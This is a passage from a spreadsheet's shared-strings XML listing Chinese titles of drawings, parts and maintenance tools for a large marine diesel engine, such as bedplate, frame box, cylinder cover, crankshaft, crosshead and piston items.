  </si>
  <si>
    <t xml:space="preserve">辅助设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">改图                                                </t>
  </si>
  <si>
    <t xml:space="preserve">备件外形图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">备件安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">MC冲洗程序                                            </t>
  </si>
  <si>
    <t xml:space="preserve">整体焊接特殊设计                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主清单A                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主清单B                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主清单C                                              </t>
  </si>
  <si>
    <t xml:space="preserve">补充项目清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管件布置清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">工具清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器布置清单                                           </t>
  </si>
  <si>
    <t xml:space="preserve">装置总体说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">供应商图                                              </t>
  </si>
  <si>
    <t xml:space="preserve">混凝土基础                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机舱布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">后续部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">温度压力传感器布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">机座-总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座中间                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座中间焊接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">端横梁                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机座焊接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座前端焊接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座前端加工                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座前中端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座后中端焊接                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机座后端焊接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座后端加工                                            </t>
  </si>
  <si>
    <t xml:space="preserve">切削方法                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钢板切割图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴向减振器安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">轴向减振器体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴向振动监控安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">减振器滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">接近仪                                               </t>
  </si>
  <si>
    <t xml:space="preserve">磨损仪                                               </t>
  </si>
  <si>
    <t xml:space="preserve">油槽                                                </t>
  </si>
  <si>
    <t xml:space="preserve">非标主轴承                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主轴瓦                                               </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承-总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承滑油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">油底壳前端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油底壳后端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">网栅                                                </t>
  </si>
  <si>
    <t xml:space="preserve">测量管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油管详图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑油吸油管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">顶法兰                                               </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油冷却器支架                                          </t>
  </si>
  <si>
    <t xml:space="preserve">液位报警                                              </t>
  </si>
  <si>
    <t xml:space="preserve">短机座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">前端板组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">地脚螺栓布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">测量尺支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">基础螺栓安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">弹力垫粘合计                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扁浮球                                               </t>
  </si>
  <si>
    <t xml:space="preserve">基础公差                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴承挤压测量                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴向减振器液压拉伸器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴提升工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承定位钢丝                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承定位钢丝                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主轴瓦定位                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主轴瓦提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承液压工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">主轴瓦拆卸钢丝                                           </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承固定架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴瓦拆卸手柄                                           </t>
  </si>
  <si>
    <t xml:space="preserve">薄壁轴瓦安装工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">泄油盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机座对中工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴向减振器起吊工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承间隙测量工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">螺柱组装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座前端提升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座后端提升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承液压拉伸器组件                                        </t>
  </si>
  <si>
    <t xml:space="preserve">钻床管子                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钻床基座定位孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">钻床滑轮轨道                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴承座上的支架布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液位报警箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">地脚螺栓装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锥体支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">基座焊接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">基架加工                                              </t>
  </si>
  <si>
    <t xml:space="preserve">定位杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">弹性底座安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液位报警安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">量油计支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油底壳焊接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑油滤器支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">发电机支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接底座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">模拟液位指示器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">框架                                                </t>
  </si>
  <si>
    <t xml:space="preserve">机架前端截面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">框架后剖面                                             </t>
  </si>
  <si>
    <t xml:space="preserve">图纸                                                </t>
  </si>
  <si>
    <t xml:space="preserve">说明                                                </t>
  </si>
  <si>
    <t xml:space="preserve">PMI系统接线箱                                          </t>
  </si>
  <si>
    <t xml:space="preserve">PMI设备装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">A型架总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">前端框架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">中间框架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">撑板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">横向定位安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座框架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">泄放                                                </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧前端横粱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧后端横梁                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧前端横梁                                           </t>
  </si>
  <si>
    <t xml:space="preserve">后端横梁                                              </t>
  </si>
  <si>
    <t xml:space="preserve">自由端机架总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">输出端机架总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">铰链安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧前端横梁                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧后短横梁                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧后端横梁                                           </t>
  </si>
  <si>
    <t xml:space="preserve">盖子前端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">盖子上部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">盖子下部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">前下端机架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">后下端机架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带主轴承的机架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">焊接机架和气缸单元                                         </t>
  </si>
  <si>
    <t xml:space="preserve">焊接机架和链条                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架分割焊接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架链条加工                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架焊接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架机加工                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架前端焊接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架前端加工                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架后端焊接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架后端加工                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架中段                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架中段前端焊接                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机架中段后端焊接                                          </t>
  </si>
  <si>
    <t xml:space="preserve">表面                                                </t>
  </si>
  <si>
    <t xml:space="preserve">泄放管安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓支撑块                                           </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺钉详细说明                                          </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓选择                                            </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓上部总成                                          </t>
  </si>
  <si>
    <t xml:space="preserve">支撑螺柱安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞冷却油漏斗                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活赛回油管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">密封环安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">护套                                                </t>
  </si>
  <si>
    <t xml:space="preserve">定向轴承安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">护套安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">热敏元件电缆管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">聚四氟乙烯环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水喷嘴安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸工具定位                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承盖拆卸工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机架提升工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架附件提升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">立铣                                                </t>
  </si>
  <si>
    <t xml:space="preserve">加工支架导板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">固定铣削支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓液压螺帽                                          </t>
  </si>
  <si>
    <t xml:space="preserve">管件液压螺帽                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压螺帽备件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">加热杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">MS-104工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">MS-102工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">导向螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架/主轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">框架安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架成形和定位工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">热传感器管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带管底的盖子                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链传动机构下部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">中间框架安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链轮箱下部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带护套的中间框架                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带盖子的链轮箱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">轴承座安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">防护上部-前端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">防护下部-前端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">防护上部-后端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">观察门                                               </t>
  </si>
  <si>
    <t xml:space="preserve">顶部护套安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油分离器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">放气帽                                               </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环外壳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环外壳上部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环外壳下部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">油密封盖总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油封盖上部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油封盖下部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">甩油环总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油封安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">底带                                                </t>
  </si>
  <si>
    <t xml:space="preserve">底部护套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架门框-前端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">门盖-后端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">自由端门盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">后端护盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">门盖上部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">门盖下部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油护套                                               </t>
  </si>
  <si>
    <t xml:space="preserve">焊接上护套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接下护套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活节螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">防护件下部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">护套上部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">护套布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油管布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮驱动盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带橡胶软管的盖子                                          </t>
  </si>
  <si>
    <t xml:space="preserve">手柄安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油封                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带安全阀的曲轴箱盖                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带漏斗管的盖子                                           </t>
  </si>
  <si>
    <t xml:space="preserve">盖子                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带填充塞的盖子                                           </t>
  </si>
  <si>
    <t xml:space="preserve">热传感器安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带底管的盖子                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带安全阀的盖子                                           </t>
  </si>
  <si>
    <t xml:space="preserve">盖子安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞清洁环的布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">缸套+活塞环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">顶部单元总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">顶部单元                                              </t>
  </si>
  <si>
    <t xml:space="preserve">链轮驱动部件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">缸套支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体装配加工                                           </t>
  </si>
  <si>
    <t xml:space="preserve">螺柱布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">水套与气缸套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷射管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水接头安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">单向阀安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">止回阀装配                                             </t>
  </si>
  <si>
    <t xml:space="preserve">密封垫圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴架内支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水套安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链条导板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">缸套提升钢丝                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸套测量工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸套用横梁                                             </t>
  </si>
  <si>
    <t xml:space="preserve">清洁工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缸套固定工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套夹圈环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">打磨把手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">套筒螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶部前端提升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">顶部后端提升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">夹具+绘图工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">倾斜上升螺旋                                            </t>
  </si>
  <si>
    <t xml:space="preserve">填料函孔防护盖                                           </t>
  </si>
  <si>
    <t xml:space="preserve">研磨机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖规格                                              </t>
  </si>
  <si>
    <t xml:space="preserve">焊接指导                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管系                                                </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀螺柱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器螺柱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧座总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀螺柱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀螺柱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">示功阀套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">示功阀螺柱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀座研磨工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀座研磨工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖架                                               </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖提升工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀座安装工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀座环取出工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架回转台                                             </t>
  </si>
  <si>
    <t xml:space="preserve">回转台                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带支架的回转台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖/缸套提升工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">专用吊具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖液压拉伸器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖提升链条                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀座研磨工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">缸套缸盖研磨机                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖支撑格栅                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀座打磨工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀研磨砂轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀研磨砂轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">手动高压泵支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压拧紧环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖紧急液压拉伸器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖拧紧工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖回转附件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">铣磨工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">液压环备件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧套检查工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖液压螺帽                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">备件工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">工具面板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">进气管横截面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖组件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖截面                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气管截面                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸顶盖支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">材料规格                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴+飞轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">疲劳机测试台                                            </t>
  </si>
  <si>
    <t xml:space="preserve">减振器安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮+甩油环安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">弹性齿轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹性齿轮安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">甩档测量工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">甩挡测量工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴向减振器测量设备                                         </t>
  </si>
  <si>
    <t xml:space="preserve">减振器工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">平衡重液压拉伸器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">热套紧配螺栓                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴链轮安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">平衡重安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">柔性齿轮安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调频轮安装                                             </t>
  </si>
  <si>
    <t>甩档差</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">连杆+十字头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">不带垫片连杆布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">报警                                                </t>
  </si>
  <si>
    <t xml:space="preserve">连杆增压泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承-上瓦                                          </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承-下瓦                                          </t>
  </si>
  <si>
    <t xml:space="preserve">轴承座-十字头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带白合金的止推环垫圈.                                       </t>
  </si>
  <si>
    <t xml:space="preserve">非标十字头轴承                                           </t>
  </si>
  <si>
    <t xml:space="preserve">非标连杆轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连杆轴承盖孔                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连杆挡圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连杆支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连杆固定工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">供油堵头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">-                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">轨道                                                </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧安装工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">取出工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">导块取出器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">钢丝导向工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">支撑工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承提升工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">导向叉                                               </t>
  </si>
  <si>
    <t xml:space="preserve">连杆起吊工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">十字头轴承固定工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">十字头防护盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">十字头销固定工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴瓦提升工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">套管固定工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">十字头悬挂链条                                           </t>
  </si>
  <si>
    <t xml:space="preserve">连杆拆卸横梁                                            </t>
  </si>
  <si>
    <t xml:space="preserve">工具盒                                               </t>
  </si>
  <si>
    <t xml:space="preserve">连杆总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铁板支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">填料函壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">固定物-刮油环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">十字头端销                                             </t>
  </si>
  <si>
    <t xml:space="preserve">平衡重板说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑块选择                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆螺柱吊环螺母                                         </t>
  </si>
  <si>
    <t xml:space="preserve">固定工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锥弹簧                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆底部提升                                           </t>
  </si>
  <si>
    <t xml:space="preserve">填料函折装工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">填料函工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">销钉扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">填料函定距工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">十字头末端液压拉伸器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">十字头液压拉伸器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">十字头运输工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">十字头提升工具-吊环螺钉                                      </t>
  </si>
  <si>
    <t xml:space="preserve">十字头提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞底部插销                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞底部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞组件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞+活塞杆                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带销活塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带螺柱的活塞头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头选择                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内冷却管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环选择表                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞提升挡圈                                            </t>
  </si>
  <si>
    <t xml:space="preserve">焊接支撑环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞导向环总图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">导螺.活塞头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">提升工具-冷套                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环拆装工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞悬挂链条                                            </t>
  </si>
  <si>
    <t xml:space="preserve">填料函挡圈                                             </t>
  </si>
  <si>
    <t xml:space="preserve">倾斜起吊工具                                            </t>
  </si>
  <si>
